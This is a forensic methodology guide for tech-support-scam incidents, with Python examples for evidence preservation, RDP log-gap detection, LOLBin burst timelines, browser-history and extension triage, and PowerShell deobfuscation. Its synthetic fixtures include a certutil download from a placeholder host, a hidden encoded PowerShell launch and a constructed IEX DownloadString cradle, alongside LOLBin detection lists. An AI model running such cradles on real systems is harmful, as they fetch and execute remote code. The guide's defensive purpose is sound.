// investigation guide

tech support scam - methodology

tech support fraud is not confused users and helpful technicians. it is a scripted remote-access takeover: a fake vendor pop-up, phone social engineering, RDP or an RMM client from an untrusted address (203.0.113.88 in the reference fixture), AnyDesk-style tooling, a malicious Chrome extension, obfuscated PowerShell, and selective Terminal Services log clearing to hide the session. the payout is gift cards or wires, not malware glory. your job is timelines, remote-access artifacts, and browser residue, captured before the victim wipes the machine out of shame.

what evidence exists and how fast it dies

artifact                                                                     | volatility                | time to loss
-----------------------------------------------------------------------------+---------------------------+-----------------------------------------------------------
Security / Terminal Services event logs                                      | persistent until rotation | hours if the actor clears or shrinks retention
RDP bitmap cache                                                             | persistent on disk        | deleted on profile wipe or by “PC cleanup” utilities
RMM / AnyDesk install metadata                                               | persistent                | removed when the victim uninstalls under caller direction
browser history and extension folders                                        | persistent on profile     | minutes if the victim resets the browser or reimages
PowerShell script-block log and PSReadLine history (ConsoleHost_history.txt) | mixed                     | cleared by “fix scripts” or disk cleanup
victim memory (running RMM session)                                          | volatile                  | lost on reboot while the incident is live
call recording / receipts (gift cards)                                       | out of band               | kept or destroyed by the victim; not always on disk

the first 10 minutes

  1. break the remote session: pull the network cable or block at the firewall, but do not power off (the live RMM session only exists in memory); do not negotiate with the caller while they still have control.
  2. record exact UTC time when access started and when the pop-up first appeared.
  3. image or copy Security.evtx and the Terminal Services logs (Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx and Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx under %SystemRoot%\System32\winevt\Logs) before they roll over.
  4. preserve %LOCALAPPDATA%\Microsoft\Terminal Server Client\Cache (RDP cache) and the user profile intact.
  5. export installed programs list focusing on AnyDesk, TeamViewer, Splashtop, or unknown “support” clients.
  6. copy the Chrome / Edge user profile Extensions folder and History database read-only (close the browser first; the History file is locked while it runs).
  7. search Desktop and Downloads for .ps1 / .bat dropped during the session; hash and copy.
  8. snapshot scheduled tasks and Run keys; scammers love residual persistence after the call.
  9. photograph or scan gift-card packaging and purchase receipts if the victim already paid—LE needs amounts.
  10. begin the path below on a forensic copy, not the live system still dialing the fraud hotline.
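The preservation steps above, as an added example that is not the page's own tooling: copy each artifact, keep its timestamps, hash it before and after the copy, and write a manifest for the hand-off. DEFAULT_ARTIFACTS lists the usual Windows locations (an assumption; adjust per host), and demo() builds a throwaway fixture so the code runs anywhere.

```python
"""Added example: preserve first-10-minutes artifacts with a SHA-256 manifest.
Not the page's tool. Paths in DEFAULT_ARTIFACTS are typical Windows locations
(assumed); demo() uses a constructed fixture instead of a live host."""
import hashlib
import json
import os
import shutil
import tempfile
from datetime import datetime, timezone

DEFAULT_ARTIFACTS = [
    r"%SystemRoot%\System32\winevt\Logs\Security.evtx",
    r"%SystemRoot%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx",
    r"%SystemRoot%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx",
    r"%LOCALAPPDATA%\Google\Chrome\User Data\Default\History",
    r"%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt",
]


def sha256_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def iso_utc(epoch):
    return datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat()


def preserve(sources, dest_dir, case_id):
    """Copy each file into dest_dir keeping its mtime, hash source and copy,
    and write dest_dir/manifest.json. Missing files are recorded, not fatal."""
    os.makedirs(dest_dir, exist_ok=True)
    manifest = {"case": case_id, "collected_utc": datetime.now(timezone.utc).isoformat(), "items": []}
    for i, raw in enumerate(sources):
        src = os.path.expandvars(raw)
        entry = {"source": src}
        if not os.path.isfile(src):
            entry["status"] = "missing"          # record the gap; keep collecting
        else:
            st = os.stat(src)
            entry["size"] = st.st_size
            entry["mtime_utc"] = iso_utc(st.st_mtime)
            entry["sha256_source"] = sha256_file(src)
            dst = os.path.join(dest_dir, f"{i:03d}_{os.path.basename(src)}")
            shutil.copy2(src, dst)                # copy2 carries the timestamps over
            os.chmod(dst, 0o444)                  # read-only copy
            entry["copy"] = dst
            entry["sha256_copy"] = sha256_file(dst)
            entry["status"] = "ok" if entry["sha256_copy"] == entry["sha256_source"] else "hash-mismatch"
        manifest["items"].append(entry)
    with open(os.path.join(dest_dir, "manifest.json"), "w", encoding="utf-8") as f:
        json.dump(manifest, f, indent=2)
    return manifest


def demo():
    """Constructed fixture: one fake Security.evtx plus one path that does not exist."""
    root = tempfile.mkdtemp(prefix="tss-")
    fake = os.path.join(root, "Security.evtx")
    with open(fake, "wb") as f:
        f.write(b"ElfFile\x00" + b"\x00" * 64)    # evtx magic, then padding
    return preserve([fake, os.path.join(root, "absent.evtx")],
                    os.path.join(root, "evidence"), "grayson-tech-support-scam")


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On a live host run it as the victim (or an admin) with preserve(DEFAULT_ARTIFACTS, "E:\\case\\evidence", "<case id>"); the manifest's source/copy hash pair is what counsel will ask for later.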

the path

  1. remote desktop log clearing and gap detector

    Terminal Services / RDP-related event exports and Security.evtx slices. surfaces selective clearing (Security 1102 for the audit log, System 104 for any other channel), timeline gaps, and remote-session tampering before the narrative hardens.
    why first: actors who ran RDP cleanup often did it early. if logs were cleared, you anchor the investigation to that damage before everything else is spun as “normal IT.”
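The clearing and gap logic described above, as an added example rather than the page's own detector. The event IDs and channel names are Windows' real ones; the records, the incident start and the 1-hour gap threshold are constructed for the Grayson scenario.

```python
"""Added example: flag log clearing and timeline gaps around an RDP session.
Not the page's tool. EVENTS below are constructed; IDs/channels are real."""
from datetime import datetime, timedelta, timezone

SEC = "Security"
SYS = "System"
LSM = "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
RCM = "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"

# Security 1102: audit log cleared. System 104: some other event log was cleared.
CLEAR_EVENTS = {(SEC, 1102), (SYS, 104)}
# Session starts that carry a client address: LSM 21 logon, LSM 25 reconnect,
# RCM 1149 (RDP auth succeeded); plus Security 4624 with logon type 10.
SESSION_EVENTS = {(LSM, 21), (LSM, 25), (RCM, 1149)}


def ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def remote_sessions(events):
    out = [e for e in events
           if (e["log"], e["event_id"]) in SESSION_EVENTS
           or ((e["log"], e["event_id"]) == (SEC, 4624) and e.get("logon_type") == 10)]
    return sorted(out, key=lambda e: e["time"])


def clear_events(events):
    return [e for e in events if (e["log"], e["event_id"]) in CLEAR_EVENTS]


def gaps(events, incident_start, max_gap):
    """Per log, consecutive surviving records (from incident_start on) farther apart than max_gap."""
    by_log = {}
    for e in sorted(events, key=lambda e: e["time"]):
        if e["time"] >= incident_start:
            by_log.setdefault(e["log"], []).append(e)
    found = []
    for log, recs in by_log.items():
        for a, b in zip(recs, recs[1:]):
            if b["time"] - a["time"] > max_gap:
                found.append({"log": log, "start": a["time"], "end": b["time"], "after_event": a["event_id"]})
    return found


def analyze(events, incident_start, max_gap=timedelta(hours=1)):
    sessions = remote_sessions(events)
    findings = []
    for c in clear_events(events):
        prior = [s for s in sessions if s["time"] <= c["time"]]
        src = prior[-1].get("source_ip") if prior else None
        what = c.get("channel", c["log"])       # 104 names the cleared channel in its data
        findings.append(f"cleared:{what} at {c['time']:%Y-%m-%dT%H:%M:%SZ} by {c.get('user')} after session from {src}")
    for log in sorted({e["log"] for e in events}):
        first = min(e["time"] for e in events if e["log"] == log)
        if first > incident_start:              # the head of the log is gone, not just quiet
            findings.append(f"head-missing:{log} earliest surviving record {first:%H:%M:%SZ} is after incident start")
    for g in gaps(events, incident_start, max_gap):
        findings.append(f"gap:{g['log']} {g['end'] - g['start']} silence after event {g['after_event']} at {g['start']:%H:%M:%SZ}")
    return {"sessions": sessions, "findings": findings}


# Constructed export: RCM survived, Security and LSM were cleared mid-session.
EVENTS = [
    {"time": ts("2024-03-03T09:00:00Z"), "log": RCM, "event_id": 1149, "user": "margaret", "source_ip": "192.168.1.20"},
    {"time": ts("2024-03-04T08:00:00Z"), "log": SYS, "event_id": 7036, "user": "SYSTEM"},
    {"time": ts("2024-03-04T14:02:10Z"), "log": RCM, "event_id": 1149, "user": "margaret", "source_ip": "203.0.113.88"},
    {"time": ts("2024-03-04T14:31:40Z"), "log": SEC, "event_id": 1102, "user": "margaret"},
    {"time": ts("2024-03-04T14:31:41Z"), "log": SYS, "event_id": 104, "user": "margaret", "channel": LSM},
    {"time": ts("2024-03-04T16:10:05Z"), "log": SEC, "event_id": 4688, "user": "margaret"},
    {"time": ts("2024-03-04T16:10:30Z"), "log": LSM, "event_id": 24, "user": "margaret", "source_ip": "203.0.113.88"},
    {"time": ts("2024-03-04T16:12:00Z"), "log": LSM, "event_id": 25, "user": "margaret", "source_ip": "203.0.113.88"},
]
INCIDENT_START = ts("2024-03-04T13:40:00Z")   # when the pop-up first appeared

if __name__ == "__main__":
    for line in analyze(EVENTS, INCIDENT_START)["findings"]:
        print(line)
```

The head-missing check is the one that survives a clean 1102: a Security log whose oldest record post-dates the pop-up has lost its head whether or not the clear event itself is still there.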

  2. rdp cache parser

    RDP bitmap cache tiles (bcache*.bmc and Cache*.bin under %LOCALAPPDATA%\Microsoft\Terminal Server Client\Cache). can recover partial screen content, including pop-ups, payment pages, or support branding.
    caveat: the bitmap cache is written by the RDP client (mstsc), so it holds what this machine displayed while connecting out. for a purely inbound session from 203.0.113.88 the victim is the server and the tiles sit on the scammer's side; expect it when the caller had the victim connect to a “support server.”
    why second: proves an interactive remote desktop session happened even when Event Log retention is thin; pairs with source IP work (e.g. 203.0.113.88) for the access story.

  3. live response tool execution artifact detector

    prefetch (C:\Windows\Prefetch), ShimCache (SYSTEM hive), Amcache.hve, and shortcut / jump-list debris for RMM-style tools. flags AnyDesk-class remote support installs and one-off “rescue” binaries dropped during the call.
    why third: separates organic helpdesk software from the scammer's remote stack. you want the install window tied to the victim's phone timeline.

  4. lolbin execution burst detector

    process creation timelines from CSV or EVTX extracts (Security 4688, Sysmon 1). highlights bursts of signed living-off-the-land binaries (certutil, mshta, regsvr32, rundll32, bitsadmin, powershell) chained for download, staging, or persistence around the incident window.
    why fourth: staged loaders often avoid obvious malware names. burst shape shows automation or scripted playbooks under the remote session.
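Steps 3 and 4 above share one timeline, so here is one added example (not the page's detectors) that does both over a process-creation CSV: tie RMM launches to the call start, and find LOLBin bursts, reporting the parent process so the burst can be pinned to the remote session. The CSV rows are constructed; the certutil URL is a placeholder.

```python
"""Added example: RMM launches and LOLBin bursts from a process-creation CSV.
Not the page's tool. SAMPLE_CSV is constructed; the URL is a placeholder."""
import csv
import io
from datetime import datetime, timedelta, timezone

LOLBINS = {"cmd.exe", "certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
           "bitsadmin.exe", "powershell.exe", "wscript.exe", "cscript.exe", "msiexec.exe"}
RMM_MARKERS = ("anydesk", "teamviewer", "splashtop")    # substring match on the image path

SAMPLE_CSV = """time,pid,ppid,image,cmdline
2024-03-04T13:58:02Z,4120,1200,C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe,chrome.exe
2024-03-04T14:05:30Z,5012,4120,C:\\Users\\margaret\\Downloads\\AnyDesk.exe,AnyDesk.exe
2024-03-04T14:20:01Z,5200,5012,C:\\Windows\\System32\\cmd.exe,cmd.exe /c start /min
2024-03-04T14:20:03Z,5210,5200,C:\\Windows\\System32\\certutil.exe,certutil -urlcache -split -f http://example.com/u.txt C:\\Users\\Public\\u.txt
2024-03-04T14:20:05Z,5220,5200,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe,powershell -nop -w hidden -enc SQBFAFgA
2024-03-04T14:20:09Z,5230,5220,C:\\Windows\\System32\\rundll32.exe,rundll32 C:\\Users\\Public\\u.txt
2024-03-04T18:40:00Z,6000,1200,C:\\Windows\\System32\\cmd.exe,cmd.exe
"""


def ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


CALL_START = ts("2024-03-04T13:45:00Z")   # when the victim dialed the number on the pop-up


def parse_csv(text):
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        r["time"] = ts(r["time"])
        r["pid"], r["ppid"] = int(r["pid"]), int(r["ppid"])
        r["name"] = r["image"].rsplit("\\", 1)[-1].lower()
        rows.append(r)
    return sorted(rows, key=lambda r: r["time"])


def rmm_launches(rows, call_start):
    """Remote-support binaries with minutes elapsed since the call began."""
    return [{"time": r["time"], "image": r["image"],
             "minutes_after_call": (r["time"] - call_start) / timedelta(minutes=1)}
            for r in rows if any(m in r["image"].lower() for m in RMM_MARKERS)]


def lolbin_bursts(rows, window=timedelta(seconds=120), min_count=3):
    """Runs of >= min_count LOLBin launches inside `window`, with the oldest parent pid."""
    lol = [r for r in rows if r["name"] in LOLBINS]
    bursts, i = [], 0
    while i < len(lol):
        j = i
        while j + 1 < len(lol) and lol[j + 1]["time"] - lol[i]["time"] <= window:
            j += 1
        run = lol[i:j + 1]
        if len(run) >= min_count:
            bursts.append({"start": run[0]["time"], "end": run[-1]["time"], "count": len(run),
                           "chain": [r["name"] for r in run], "root_ppid": run[0]["ppid"]})
            i = j + 1
        else:
            i += 1          # a burst may still start at the next event
    return bursts


def analyze(csv_text, call_start):
    rows = parse_csv(csv_text)
    by_pid = {r["pid"]: r["name"] for r in rows}     # pid reuse over long windows is possible; check times
    bursts = lolbin_bursts(rows)
    for b in bursts:
        b["root_image"] = by_pid.get(b["root_ppid"], "unknown")
    return {"rmm": rmm_launches(rows, call_start), "bursts": bursts}


if __name__ == "__main__":
    print(analyze(SAMPLE_CSV, CALL_START))
```

In the sample the four-binary burst is parented by pid 5012, the AnyDesk launch 20.5 minutes into the call, which is the link between the remote stack and the staged loader that the page asks for.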

  5. browser history extractor

    Chrome / Edge SQLite History databases (timestamps are microseconds since 1601-01-01 UTC, not Unix time). extracts the fake “Microsoft” alert page, typo domains, and support portal visits that preceded the phone call.
    why fifth: victims remember the pop-up, not the URL. history is the silent witness that predates RDP and gift-card pressure.
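The extraction above, as an added example (not the page's extractor): read the urls/visits tables, convert the WebKit timestamps, and flag lookalike vendor hosts and pressure wording. The schema is the subset of Chrome's real tables the query needs; the visits are constructed and the .example hosts are placeholders.

```python
"""Added example: pull the pre-call browsing trail out of a Chrome/Edge History
database and flag lookalike "support" pages. Not the page's tool. Schema is a
subset of Chrome's urls/visits tables; rows in build_sample() are constructed."""
import sqlite3
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)   # Chrome: microseconds since 1601-01-01 UTC

BRAND_WORDS = ("microsoft", "windows", "defender")
OFFICIAL = ("microsoft.com", "windows.com", "live.com", "office.com")
PRESSURE_WORDS = ("alert", "warning", "virus", "blocked", "support", "helpdesk", "error")


def ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def webkit_to_utc(t):
    return WEBKIT_EPOCH + timedelta(microseconds=int(t))


def utc_to_webkit(dt):
    return (dt - WEBKIT_EPOCH) // timedelta(microseconds=1)


def flags_for(url, title):
    host = (urlparse(url).hostname or "").lower()
    out = []
    official = any(host == o or host.endswith("." + o) for o in OFFICIAL)
    if any(w in host for w in BRAND_WORDS) and not official:
        out.append("brand-lookalike")
    text = " ".join((host, urlparse(url).path, title or "")).lower()
    if any(w in text for w in PRESSURE_WORDS):
        out.append("pressure-wording")
    return out


def extract(conn, start, end):
    rows = conn.execute(
        "SELECT u.url, u.title, v.visit_time FROM visits v JOIN urls u ON u.id = v.url "
        "WHERE v.visit_time BETWEEN ? AND ? ORDER BY v.visit_time",
        (utc_to_webkit(start), utc_to_webkit(end))).fetchall()
    return [{"time": webkit_to_utc(t), "url": url, "title": title, "flags": flags_for(url, title)}
            for url, title, t in rows]


def open_history(path):
    """Open a copied History file read-only; immutable=1 keeps SQLite from writing to it."""
    return sqlite3.connect(f"file:{path}?mode=ro&immutable=1", uri=True)


def build_sample():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE urls(id INTEGER PRIMARY KEY, url LONGVARCHAR, title LONGVARCHAR,
                          visit_count INTEGER, typed_count INTEGER, last_visit_time INTEGER, hidden INTEGER);
        CREATE TABLE visits(id INTEGER PRIMARY KEY, url INTEGER, visit_time INTEGER,
                            from_visit INTEGER, transition INTEGER);
    """)
    visits = [  # constructed trail: real vendor, fake alert page, RMM download, card balance check
        ("https://www.microsoft.com/en-us/", "Microsoft", "2024-03-04T13:10:00Z"),
        ("http://microsoft-security-alert.example/warning.html", "Windows Security Alert: your PC is blocked", "2024-03-04T13:38:20Z"),
        ("https://anydesk.com/en/downloads", "AnyDesk", "2024-03-04T14:04:50Z"),
        ("https://giftcards.example/balance", "Check balance", "2024-03-04T15:02:00Z"),
    ]
    for i, (url, title, when) in enumerate(visits, start=1):
        t = utc_to_webkit(ts(when))
        conn.execute("INSERT INTO urls VALUES (?,?,?,?,?,?,?)", (i, url, title, 1, 0, t, 0))
        conn.execute("INSERT INTO visits VALUES (?,?,?,?,?)", (i, i, t, 0, 0))
    return conn


if __name__ == "__main__":
    for row in extract(build_sample(), ts("2024-03-04T13:00:00Z"), ts("2024-03-04T16:00:00Z")):
        print(row["time"], row["flags"], row["url"])
```

Run it against the copied profile with open_history(r"...\Default\History"); a real visits table also carries from_visit and transition, which show whether the alert page was typed, clicked from an ad, or reached by redirect.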

  6. browser extension analyzer

    extension manifests and background script bundles from a profile export. lists permissions, content-script reach, and update URLs that do not match storefront claims.
    why sixth: scam operators plant “support” or “security” extensions during remote control. catch them before the victim uninstalls the browser profile.

  7. chrome extension analyzer

    Chrome-specific extension packaging: Chrome Web Store (CWS) install vs unpacked vs policy-forced IDs (ExtensionInstallForcelist). pinpoints sideloaded CRX paths and enterprise policy abuse used to keep a malicious add-on sticky.
    why seventh: drills into Chrome-only signals once the generic analyzer has shown something off. good for the persistent browser hook in the Grayson fixture.
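Steps 6 and 7 above share the same input, so here is one added example (not the page's analyzers) covering both: score a manifest's permissions, content-script reach and update_url, derive the extension ID from a pinned key the way Chrome does, and cross-check it against ExtensionInstallForcelist values. The Web Store update URL and the forcelist "id;update_url" format are Chrome's; the manifest, key bytes and .example host are constructed.

```python
"""Added example: triage an extension from its manifest plus the Chrome
force-install policy. Not the page's tool. SAMPLE_* values are constructed."""
import base64
import hashlib
import json

CWS_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
RISKY_PERMS = {"webRequest", "webRequestBlocking", "declarativeNetRequest", "tabs", "cookies",
               "nativeMessaging", "scripting", "management", "proxy", "history", "clipboardRead"}


def extension_id_from_key(key_b64):
    """Chrome ID = first 32 hex chars of SHA-256(DER public key), mapped 0-9a-f -> a-p."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).hexdigest()[:32]
    return "".join(chr(ord("a") + int(c, 16)) for c in digest)


def analyze_manifest(manifest):
    findings = []
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    if perms & BROAD_HOSTS:
        findings.append("host access to every site")
    risky = sorted(perms & RISKY_PERMS)
    if risky:
        findings.append("risky permissions: " + ", ".join(risky))
    for cs in manifest.get("content_scripts", []):
        if set(cs.get("matches", [])) & BROAD_HOSTS:
            findings.append("content script injected into every page: " + ", ".join(cs.get("js", [])))
    upd = manifest.get("update_url")
    if upd is None:
        findings.append("no update_url: unpacked/sideloaded, not a Web Store install")
    elif upd != CWS_UPDATE_URL:
        findings.append("update_url is not the Chrome Web Store: " + upd)
    if "key" in manifest:
        findings.append("manifest pins a public key (stable id outside the store): " + extension_id_from_key(manifest["key"]))
    return findings


def parse_forcelist(values):
    """ExtensionInstallForcelist registry values are 'id;update_url' strings."""
    out = []
    for v in values:
        ext_id, _, upd = v.partition(";")
        out.append({"id": ext_id, "update_url": upd or None,
                    "non_store": bool(upd) and upd != CWS_UPDATE_URL})
    return out


def triage(manifest_text, forcelist_values):
    m = json.loads(manifest_text)
    findings = analyze_manifest(m)
    forced = parse_forcelist(forcelist_values)
    if "key" in m:
        ext_id = extension_id_from_key(m["key"])
        if any(f["id"] == ext_id for f in forced):
            findings.append("id " + ext_id + " is in ExtensionInstallForcelist: policy-forced, user cannot remove it")
    return {"name": m.get("name"), "findings": findings, "forcelist": forced}


# Constructed sample: not a real DER key, not a real update host.
SAMPLE_KEY = base64.b64encode(b"constructed-not-a-real-DER-key").decode()
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Microsoft Security Support",
    "version": "1.0.4",
    "permissions": ["tabs", "webRequest", "nativeMessaging", "storage"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
    "update_url": "https://updates.example/crx/update.xml",
    "key": SAMPLE_KEY,
})
SAMPLE_FORCELIST = [extension_id_from_key(SAMPLE_KEY) + ";https://updates.example/crx/update.xml"]

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MANIFEST, SAMPLE_FORCELIST), indent=2))
```

On a real profile the manifest is Extensions\<id>\<version>\manifest.json and the forcelist values come from HKLM or HKCU\Software\Policies\Google\Chrome\ExtensionInstallForcelist (Edge uses the Microsoft\Edge policy path with the same value format).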

  8. powershell deobfuscator

    base64, string-reorder, and invoke-expression wrapped scripts from disk, transcripts, or script-block logging (Microsoft-Windows-PowerShell/Operational 4104). expands obfuscated download cradles and second-stage loaders into readable intent.
    why last: PowerShell is late-stage execution. once remote access and browser artifacts are mapped, deobfuscation explains what the actor actually ran, not what the caller claimed.
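The peeling described above, as an added example rather than the page's deobfuscator: decode -EncodedCommand, expand FromBase64String wrappers into new layers, rewrite reversed-string joins and [char] arithmetic in place, then list the IOCs. build_sample() constructs a three-layer cradle so the run is self-contained; the URL in it is a placeholder.

```python
"""Added example: peel -EncodedCommand, FromBase64String, reversed-string joins
and [char] arithmetic out of a PowerShell one-liner and list the IOCs.
Not the page's tool. build_sample() is constructed; the URL is a placeholder."""
import base64
import re

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
B64_RE = re.compile(
    r"(?:\[(?:System\.)?Text\.Encoding\]::(UTF8|Unicode|ASCII)\.GetString\()?"
    r"\[(?:System\.)?Convert\]::FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)\)?", re.I)
CHAR_RE = re.compile(r"\(\s*((?:\[char\]\d+\s*\+\s*)*\[char\]\d+)\s*\)", re.I)
JOIN_RE = re.compile(r"-join\s*\$(\w+)\[-1\s*\.\.\s*-\(\$\1\.Length\)\]", re.I)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'")
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def decode_encoded_command(cmdline):
    m = ENC_RE.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def rewrite_chars(text):
    """([char]73+[char]69+[char]88) -> 'IEX'"""
    return CHAR_RE.sub(lambda m: "'" + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))) + "'", text)


def rewrite_reverse(text):
    """$x='gnirts'; ... -join $x[-1..-($x.Length)] -> 'string'"""
    strings = dict(ASSIGN_RE.findall(text))
    return JOIN_RE.sub(lambda m: "'" + strings[m.group(1)][::-1] + "'" if m.group(1) in strings else m.group(0), text)


def peel(cmdline, max_layers=10):
    """Return the successive plaintext layers, outermost first."""
    layers = []
    cur = decode_encoded_command(cmdline) or cmdline
    for _ in range(max_layers):
        cur = rewrite_reverse(rewrite_chars(cur))
        layers.append(cur)
        m = B64_RE.search(cur)
        if not m:
            break
        codec = "utf-16-le" if (m.group(1) or "").lower() == "unicode" else "utf-8"
        cur = base64.b64decode(m.group(2)).decode(codec, "replace")
    return layers


def report(cmdline):
    layers = peel(cmdline)
    text = "\n".join(layers)
    flags = []
    if ENC_RE.search(cmdline):
        flags.append("encoded-command")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I):
        flags.append("hidden-window")
    if re.search(r"-nop(?:rofile)?\b", cmdline, re.I):
        flags.append("no-profile")
    if re.search(r"\bIEX\b|Invoke-Expression", text, re.I):
        flags.append("invoke-expression")
    if re.search(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", text, re.I):
        flags.append("download-cradle")
    return {"layers": layers, "urls": sorted(set(URL_RE.findall(text))), "flags": flags}


def build_sample():
    """Constructed three-layer cradle of the kind the page describes."""
    inner = '$c=New-Object Net.WebClient;IEX $c.DownloadString("http://example.com/a.ps1")'
    middle = "$r='" + inner[::-1] + "';([char]73+[char]69+[char]88) (-join $r[-1..-($r.Length)])"
    outer = ("$p=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
             + base64.b64encode(middle.encode()).decode() + "'));IEX $p")
    return "powershell.exe -nop -w hidden -enc " + base64.b64encode(outer.encode("utf-16-le")).decode()


if __name__ == "__main__":
    r = report(build_sample())
    for i, layer in enumerate(r["layers"]):
        print(f"--- layer {i}\n{layer}")
    print(r["urls"], r["flags"])
```

Feed it the cmdline from a 4688 / Sysmon 1 record or the ScriptBlockText from a 4104; each decoded FromBase64String becomes its own layer so the report keeps the stages in the order the actor ran them.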

common false leads

  • “it was a virus pop-up.” the pop-up is usually a web page served by malicious advertising or a typosquat, not malware; the scam is still remote access plus payment pressure.
  • “legitimate IT uses AnyDesk too.” true, so a branded binary proves nothing on its own and its absence does not disprove fraud; correlate installer time with the phone call.
  • “an empty Security log means no intrusion.” selective clearing is a control failure, not evidence of health.
  • “the victim authorized the session.” consent under deception is still a crime report; do not treat clicks as informed approval.
  • “gift cards are untraceable, so there is nothing left to do.” issuer fraud desks and LE handle the money; your focus is proving access, malware, and the laundering instructions for IC3.

what we can tell you, what we can't

we can tell you:

  • Terminal Services / RDP log clearing and gap signatures from exported logs
  • RDP cache tile recovery for on-screen context during remote control
  • RMM and live-response tooling artifacts from common Windows forensics extracts
  • LOLBin execution bursts aligned to the incident clock
  • browser history and Chrome extension analysis for malicious add-ons
  • PowerShell deobfuscation for staged downloaders and callbacks

we can't tell you:

  • recover gift-card funds. issuer fraud desks and law enforcement only.
  • attribute the caller to a named individual without telco or bank subpoenas.
  • prove criminal intent in court. that is counsel and LE.
  • intercept live C2. the tools collect on the endpoint and analyze offline in the browser.

handing it off

  • IC3 / local police: timeline UTC, phone numbers dialed, RDP/RMM IOCs, gift-card issuer and card serials if available, export of deceptive URLs.
  • financial institution fraud desk: wire attempts, Zelle/crypto pivot instructions—often parallel to gift-card pressure.
  • victim advocates / elder-support orgs: emotional stabilization before second-stage reinstall of remote tools.
  • outside counsel: preservation memo for EVTX, browser profiles, and RDP cache hashes if litigation or insurance follows.

further reading

reference investigation

synthetic fixture grayson-tech-support-scam: Margaret Grayson scenario—fake Microsoft pop-up, inbound RDP from 203.0.113.88, AnyDesk-style remote tooling, malicious Chrome extension, obfuscated PowerShell loader, Terminal Services log clearing, gift-card pressure. seed grayson-tech-support-scam:v1. compare output via npm run check:flagship.

fixture download: evidence zip · proof page: /forensics/proof/grayson-tech-support-scam · case playbook: case type tools
